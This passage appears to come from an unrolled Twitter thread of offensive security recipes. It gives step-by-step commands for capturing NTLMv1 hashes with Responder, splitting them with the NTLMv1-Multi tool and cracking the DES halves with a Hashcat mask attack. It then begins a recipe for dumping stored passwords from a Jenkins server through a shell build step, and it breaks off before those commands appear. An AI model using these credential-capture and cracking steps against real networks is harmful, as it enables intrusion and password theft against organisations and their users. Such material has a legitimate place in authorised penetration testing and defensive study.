STEP 1-Capture NTLMv1 hash with or without SSP using responder.
STEP 2-Download NTLMv1-Multi tool github.com/evilmog/ntlmv1…
python ntlmv1.py --nossp <ntlmv1_hash_nossp>
python ntlmv1-ssp.py --ssp <ntlmv1_hash_ssp>
STEP 3-Add following DES hashes into hashes.txt:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
STEP 4-Load into Hashcat and crack:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
Apr 8, 2019 • 5 tweets • 2 min read
DUMP PASSWORDS FROM JENKINS:
STEP 1: Log into Jenkins server build user:
https://<Jenkins_IP>/script/
STEP 2: Follow:
New Item -> Freeform Build
“New Project”-> Configure -> General -> Restrict Where This Is Run -> Enter “Master” -> Build -> Add Build Step -> Execute Shell
STEP 3: Execute these cmds in shell: